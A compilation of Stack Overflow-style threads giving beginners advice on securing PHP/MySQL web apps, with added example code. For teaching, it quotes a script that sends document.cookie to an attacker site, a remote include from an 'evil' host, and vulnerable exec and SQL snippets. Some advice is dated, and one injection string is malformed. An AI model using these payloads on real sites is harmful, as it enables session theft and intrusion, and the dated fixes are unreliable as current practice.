Basic principles for securing a web-app? [duplicate]

Closed 12 years ago.
Possible Duplicate:
PHP Session Security
I've just finished coding the basics of a web-app (the main code) and I've integrated a basic user system. This is my first web-app, so I'm wondering what I should use to secure it. I already know about things like mysql_real_escape_string() and strip_tags(), but what else? How would I securely store usernames and passwords through cookies and sessions? Any tips, tutorials, etc. are greatly appreciated!

OWASP has some very helpful guides to the most common vulnerabilities and good recommendations as to how to mitigate them. You should familiarize yourself with the attacks and vulnerabilities they cover.
Reading through these might take time, but there's not too much and it's not particularly dense reading. Maybe you should focus on their top 10 security risks first.

CWE/SANS Top 25 Most Dangerous Software Errors helped me a lot.
real_escape_string only combats MySQL injection. Also, when a user must input a number, for example reading newsid=n from a URL like index.php?newsid=3, make sure $_GET['newsid'] is an integer by adding (int) before $_GET['newsid'].
Some really basic things ;) Hope the link helps.


How much web security knowledge do I need before I can publish my site? [closed]

Closed 10 years ago.
I'm coding my first php/mysql site and realize that I know very little about security beyond what I learned in my course/book. How much security knowledge do I need before I can publish my own site without being concerned that achieving even modest success will draw hackers and lead to my site being broken into?
If it helps with more specifics, I'm creating a site that will allow users to add plain text content, as well as browse what others have added. The text is meant to be stored in a db.
You cannot know everything, so it depends on what possible attack vectors your code has and what the risks are.
Ask yourself:
Do I include or read files based on user input? Then you should know why white-listing is important and what the risks of stream wrappers are (i.e. include 'http://evil.example.com/hack.txt';). See: PHP - Is "include" function secure?
Do I output user generated content or content based on user input? Then you should know what XSS (Cross Site Scripting) is and how to prevent it
Do I use dynamic SQL queries? Then you should know what SQL Injections are and how to prevent them. Side note: Don't use the mysql_ functions anymore. See: The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead
Do I use sessions? Then you should know what Session Hijacking is and how to prevent it.
Do I use file uploads? Then you should know about securing file uploads (PDF link)
Do I handle user passwords? Then you should know about state-of-the-art password hashing, namely bcrypt. See: How do you use bcrypt for hashing passwords in PHP?
Do I use user-specific forms? Then you should know about CSRF (Cross Site Request Forgery) and how to prevent it
Do I use forms that send mails? Then you should know about Email Injection, or use a library that you know is secured against it, like swiftmailer.
Do I use any form at all? Then don't use PHP_SELF as its action, because XSS is also a possible attack on $_SERVER variables.
This list is not complete, but it should cover the most common use cases for simple web applications and their security threats.
Regarding risk:
As soon as you handle sensitive personal data of users or host the site on your own virtual server, you have additional responsibilities, because the worst case is no longer just that your site could be broken: private data could be exposed, your server could be turned into a spambot, or worse.
The most important rule is: DON'T TRUST ANY INCOMING DATA
An extension to this rule, important for beginners: use exactly the measures that fit the current context. DO NOT JUST THROW EVERYTHING AT THE USER INPUT THAT YOU KNOW AND HOPE IT WILL BE MORE SECURE; this is counterproductive! I often see questions like: "Is my application secure if I use addslashes(mysql_real_escape_string(strip_tags(htmlspecialchars()))) on all my $_POST variables?" If you even consider this a valid approach, you have a serious misunderstanding of how security regarding user input works. I repeat: what's secure and what isn't always depends on the context!
A great resource to learn from is the Open Web Application Security Project.
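As an added illustration of that "one measure per context" rule (example code, not part of the answer above): an integer id is validated as an integer, SQL values are bound by the driver, HTML is encoded at output time, and passwords are hashed with bcrypt. The PDO DSN, credentials and the `news`/`users` table layout are assumptions.

```php
<?php
// Added example: one measure per context, rather than stacking escaping functions on $_POST.
// The DSN, credentials and the `news` (id, title, body) / `users` (username, password_hash)
// tables are assumptions made for this illustration.
declare(strict_types=1);

$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app_user', 'PLACEHOLDER', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
]);

// Context 1: a numeric id from the URL (index.php?newsid=3) is validated as an integer.
$newsId = filter_input(INPUT_GET, 'newsid', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($newsId === null || $newsId === false) {
    http_response_code(400);
    exit('invalid newsid');
}

// Context 2: SQL. The value is bound by the driver and never spliced into the query text.
$stmt = $pdo->prepare('SELECT title, body FROM news WHERE id = :id');
$stmt->execute([':id' => $newsId]);
$news = $stmt->fetch(PDO::FETCH_ASSOC);

// Context 3: HTML output. Encode at the point of output, for the HTML context, not on input.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}
if ($news !== false) {
    echo '<h1>' . h($news['title']) . '</h1>';
    echo '<p>' . nl2br(h($news['body'])) . '</p>'; // plain-text body with line breaks kept
}

// Context 4: password storage. A slow salted hash (bcrypt), no escaping or stripping at all.
function registerUser(PDO $pdo, string $username, string $password): void
{
    $hash = password_hash($password, PASSWORD_BCRYPT, ['cost' => 12]);
    $pdo->prepare('INSERT INTO users (username, password_hash) VALUES (:u, :h)')
        ->execute([':u' => $username, ':h' => $hash]);
}

function loginUser(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password_hash']);
}
```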
It's never enough. But you will hopefully keep improving. And probably when you'll be ready, you'll know yourself.
Learn the most common security issues, such as:
SQL injections
Form spoofing
XSS
and remember to:
always validate user input (including sessions)
block access to folders that shouldn't be public
use Blowfish instead of md5/sha1 for passwords
hide errors to the end user (and log them)
Also take a look at this guide which sums up the most famous security problems.
Take a look into SQL injections and XSS. It is all in validating a user's input. Never trust a user.
SQL Injections
XSS
Lastly, the best way to learn is to suffer from an attack because of bad security. Then you understand how it works. Just one tip: make backups.
The most critical in your website would be that the users can provide text to your database.
Read this question here on Stack Overflow for a good answer on how to prevent SQL injection:
How to prevent SQL injection in PHP

Securing PHP sessions from XSS attacks [closed]

Closed 10 years ago.
I've been reading a lot of articles on owasp.org, and one of the things that I remember most and couldn't understand well is securing PHP sessions.
I couldn't understand well how securing sessions goes, and therefore I am asking here. What is the best way to secure sessions in PHP?
Side question: Are file inputs vulnerable by XSS?
This is the source for PHP sessions hijacking:
OWASP.org: PHP Security Cheat Sheet
What is the best way to secure sessions in PHP?
Security is nothing like, let's say, a bottle of milk you go to buy in the shop. Reading customer reviews will probably tell you what the best milk is; however, for security this is a little different.
The customer reviews are what OWASP outlines. It tells you the general dynamics and implications of secure session handling.
As PHP sessions are only some kind of basic feature offered by PHP itself, there is not much to tell you about the best way to secure these sessions, because it depends a lot on how you use that feature.
However, one clear part of the best way to use PHP sessions is to keep an eye on security reports and reviews of PHP itself and the session feature in specific. Then take care that you keep current with the version of PHP that offers the best way to secure sessions, which might be the latest stable version. Sometimes, if flaws are reported, things are not entirely fixed in the next version, so take care.
Everything else not related to PHP specifically is undefined and Owasp can only offer a subset here.
So for security it is absolutely important that you first understand what is outlined in the OWASP documentation before you can start to apply this to (your) PHP code. E.g. by asking here, the best direction that can be given IMHO is that you work harder to understand what is going on and what is meant in the OWASP docs.
Understanding how things work is key in security.
Here are some of the major issues to keep in mind:
Not validating user input
Suppose you have a web page that allows a user to see the contents of a folder (for example, you're a hosting company and are showing the user their files on the server).
Here is some code that might make it happen:
$directory = $_GET['directory'];
exec("ls $directory", $result);
An attacker can exploit this by passing in other commands in to the url string, such as:
ls -LR
Session Hijacking
Each session has a unique ID; if an attacker gets hold of it, they can (potentially) use it to obtain confidential information.
To protect against this have the user reauthenticate (with their passwords) before doing anything sensitive (for example, if the user wants to reset their password, force them to enter the old password first)
XSS (cross site scripting attack)
Whenever you have a site with user generated content (a good example of this is comments on a blog), there is a potential threat that an attacker will place JavaScript into his content (read: his comment) that could potentially harm all users who come to the page.
Here is an example:
<script>
document.location = 'http://www.hackingYou.com/stealYourData.php?' + document.cookie;
</script>
This code will allow the attacker's website (hackingYou.com) to steal the cookie that you have for the website you are currently visiting.
One way to protect against this is to remove any HTML from any string being inputted using the following command:
strip_tags($input);
SQL Injection
(wouldn't be a decent answer without this one)
Suppose you have a web page that logs in users to a site. In order to log them in successfully you check for their record in a DB.
Here is how it might be coded:
$sql = "SELECT * FROM users WHERE username = {$_GET['username']} and password = {$_GET['password']}";
An attacker can exploit this by entering into the password field:
abcd OR WHERE 1 = 1
The resulting SQL statement would look like this:
SELECT * FROM users WHERE username = hacker AND password = abcd OR WHERE 1 = 1;
This would spit out the full table of ALL usernames and passwords to the attacker.
To protect against this "sanitize" your input strings for SQL using the following command:
mysql_real_escape_string($input)
These are most of the basics; obviously, one should always keep up to date by reading the latest security bulletins, such as:
Bug Track
PHP Security Consortium (PHP experts who focus on security)
OWASP
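The hardened counterparts of two items in the answer above, as an added example that is not part of the answer: listing a directory without ever building a shell command, and session handling that limits hijacking and fixation. The base directory and the 300-second re-authentication window are assumptions.

```php
<?php
// Added example (not from the original answer); base directory and 300 s re-auth window are assumptions.
declare(strict_types=1);

// Directory listing without a shell. exec("ls $directory") passes user input to /bin/sh;
// here the path is resolved, confined to the user's base directory, and read with scandir().
function listUserDirectory(string $baseDir, string $requested): array
{
    $base   = realpath($baseDir);
    $target = realpath($baseDir . '/' . $requested);   // false when the path does not exist
    if ($base === false || $target === false || !is_dir($target)) {
        throw new RuntimeException('no such directory');
    }
    // realpath() has already collapsed "..", so a prefix check is enough to stop traversal.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($target !== $base && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('path outside the allowed directory');
    }
    return array_values(array_diff(scandir($target), ['.', '..']));
}

// Session hardening. HttpOnly keeps the id away from script (the document.cookie theft above),
// Secure keeps it off plain HTTP, strict mode refuses ids the server did not issue, and
// regenerating the id at login defeats session fixation.
function startHardenedSession(): void
{
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');
    session_set_cookie_params([
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

function loginSucceeded(int $userId): void
{
    session_regenerate_id(true);        // fresh id; the pre-login id is deleted
    $_SESSION['user_id']   = $userId;
    $_SESSION['auth_time'] = time();
}

// The answer's "reauthenticate before anything sensitive": require a password check newer than $maxAge.
function hasRecentAuth(int $maxAge = 300): bool
{
    return isset($_SESSION['auth_time']) && (time() - $_SESSION['auth_time']) <= $maxAge;
}
```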
The best way to ensure security for all of your environment is to learn a PHP web framework, which will give you ready-to-go security-level inputs.
Obviously, perfect security doesn't exist; there is only better security and worse security. What I suggest is not to reinvent the wheel: web frameworks are fixed every day according to community bug/hack reports, and this, I think, is the biggest security level you can get!

Things to take into account when making a website?

What security considerations should I/do I have to take into account if I decide to make a professional website (HTML, CSS, JavaScript, PHP, etc.)? For example, when having a database, one should think about hackers who want to hack the website by SQL injection. But there are many other examples. What I would like to know is a list of (security) things a webmaster must consider/take into account. Also maybe some things that are recommended, but not a must. A short explanation about each topic is much appreciated, but you don't have to. Thanks in advance.
Btw. I'm not sure about the tags. Please add/modify if you know better.
The best resource for securing web applications is the OWASP Top 10: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
I suggest you read through each of these top 10 security risks and ensure you understand three things:
What the risk is
How it is exploited
How to protect against it in your language of choice

php/mysql app security issues? [duplicate]

Closed 12 years ago.
Possible Duplicate:
Where can I find a web-project “security checklist?”
I was just wondering, when creating a PHP/MySQL app, what the main security issues a developer has to consider are. I know this could be a very broad topic, but I just wanted an overview of where to look, and what I need to be aware of while I'm writing and developing the app. Thanks!! :))
VERY broad topic indeed. Just to name the basics, which ideally everyone should be aware of:
Don't trust any user input. By this I mean sanitize all user input to prevent SQL injection.
Escape all data being output on the page appropriately to prevent XSS vulnerabilities and cookie data.
Do not include files based on user input
Log all your errors appropriately. Ideally, in an error log.
Store passwords via a one-way hash which incorporates a secure salt.
And read through Seven habits for writing secure PHP applications.
You can take a look at the OWASP Top 10, which is a top 10 of the most common flaws in web applications. It covers the most common issues that you will come across.
Web version
PDF version
There are some very useful references to security checklists that you should consider in this previous response to the same question.

How to secure PHP from piggy backing?

I just read this article about piggybacking in PHP.
I googled it, but there is not much information there.
Can anyone tell me more details about how to prevent this kind of attack, what kind of code practices are vulnerable, and what we should do?
Thanks in advance.
That article seems to refer to a vulnerable web application, not anything specific to PHP.
This previous thread provides some useful information regarding writing secure PHP code:
What security issues should I look out for in PHP
If we take the "They used these vulnerabilities to inject PHP code into the site" part of the article literally, then the developers likely used user input with include/require statements or eval.
The article isn't particularly clear, but my guess is that they just used SQL injection and, to try to avoid detection, they inserted a script that didn't actually change the behavior of the site normally unless the visitor came from Google using a relevant search term, and the author is calling the redirection in that situation "piggybacking".
So: escape and validate all user input.
First link really on the general subject should give you some overview.
Second link is PHP / SQL - specific and should lead you to enlightenment.
The BBC news article is talking about "persistent XSS". Leave it to the news to talk about hacking without mentioning anything about vulnerabilities. But that could be that bbc.co.uk doesn't know what an XSS vulnerability is, because if they did they would patch their own damn site!
There are many ways to achieve remote code execution against a PHP web application. No one should ever call this "PHP Injection", if they call it this then they don't know what they are talking about. A Study In Scarlet is an excellent paper that details many different methods that an attacker can use to obtain remote code execution against a PHP application. This paper is intended for malicious hackers, not developers.
XSS is by far the easiest and most common method to nefariously place advertisements on somebody's site.